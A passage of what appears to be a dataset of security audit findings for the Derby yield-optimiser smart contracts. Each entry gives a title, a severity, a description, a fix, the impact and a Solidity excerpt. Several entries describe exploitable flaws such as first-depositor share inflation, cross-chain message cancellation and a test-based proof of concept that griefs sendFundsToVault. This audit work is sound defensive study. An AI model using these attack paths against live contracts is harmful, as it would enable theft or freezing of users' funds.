getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.чYou need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.чReserved funds protection can be brokenч```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n -Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next periodчmediumчGame doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.чFirst of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.чPlayer looses all his rewardsч```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n -Vault.blacklistProtocol can revert in emergencyчmediumчVault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.чProvide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(\"vault\", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(\"vault\", true) and tries to withdrawчHacked or paused protocol can't be set to blacklist.ч```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n -The protocol could not handle multiple vaults correctlyчmediumчThe protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), \"No rebalance needed\");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`чKeep tracking the `lastTimeStamp` for every `_vaultNumber` by using an arrayчThe protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right valuesч```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n -User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol priceчmediumчUser should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.чIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.чUser's rewards calculation is unpredictable.ч```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n -Malicious users could set allocations to a blacklist Protocol and break the rebalancing logicчmediumч`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), \"Protocol on blacklist\");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()чIssue Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic\\nYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`чThe guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.ч```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n -inflate initial share price by initial depositorчmediumчinitial deposit can be front-runned by non-whitelist address to inflate share price evading the `training` block, then all users after the first (the attacker) will receive no shares in return for their deposit.\\n`training` block inside `deposit` function intended to be set as true right after deployment. This `training` variable is to make sure the early depositor address is in the whitelist, thus negating any malicious behaviour (especially the first initial depositor)\\n```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n\\nFirst initial depositor issue is pretty well-known issue in vault share-based token minting for initial deposit which is susceptible to manipulation. This issue arise when the initial vault balance is 0, and initial depositor (attacker) can manipulate this share accounting by donating small amount, thus inflate the share price of his deposit. There are a lot of findings about this initial depositor share issue.\\nEven though the `training` block is (probably) written to mitigate this initial deposit, but since the execution of setting the `training` to be true is not in one transaction, then it's possible to be front-runned by attacker. Then this is again, will make the initial deposit susceptible to attack.\\nThe attack vector and impact is the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large “donation”.\\nThe initial exchangeRate is a fixed value set on constructor which is not related to totalSupply, but later it will use this totalSupply\\n```\\nFile: MainVault.sol\\n exchangeRate = _uScale;\\n// rest of code\\n function setXChainAllocationInt(\\n uint256 _amountToSend,\\n uint256 _exchangeRate,\\n bool _receivingFunds\\n ) internal {\\n amountToSendXChain = _amountToSend;\\n exchangeRate = _exchangeRate;\\n\\n if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();\\n else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;\\n else state = State.SendingFundsXChain;\\n }\\n\\nFile: XChainController.sol\\n uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n uint256 totalSupply = getTotalSupply(_vaultNumber);\\n\\n uint256 decimals = xProvider.getDecimals(vault);\\n uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\nчThe simplest way around for this is just set the initial `training` to be `true` either in the variable definition or set it in constructor, so the initial depositor will be from the whitelist.\\nor, more common solution for this issue is, require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address)чinitial depositor can inflate share price, other user (next depositor) can lost their assetч```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n -Wrong calculation of `balanceBefore` and `balanceAfter` in deposit methodчmediumчDeposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`чIssue Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method\\nUse below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\nчDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`ч```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n -Vault could `rebalance()` before funds arrive from xChainControllerчmediumчInvoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor \"fast path\" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.чCheck if funds are arrived or notчThe vault could `rebalance()` before funds arrive from xChainController, this will reduce rewardsч```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n -`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad stateчmediumчA user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\nчI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\nчXChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.ч```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n -Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.чmediumчThe WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\nчThe WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.чProtocol will not work on most of the supported blockchains.ч```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n -Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaultsчmediumчRebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\nчIn `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.чDue to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.ч```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n -Wrong type casting leads to unsigned integer underflow exception when current price is < last priceчmediumчWhen the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.чCasting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\nчThe rebalance will fail when the current token price is less than the last one stored.ч```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n -withdrawal request overrideчmediumчIt is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.чRequire `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.чWhile not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.ч```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n -Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.чhighчCertain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as 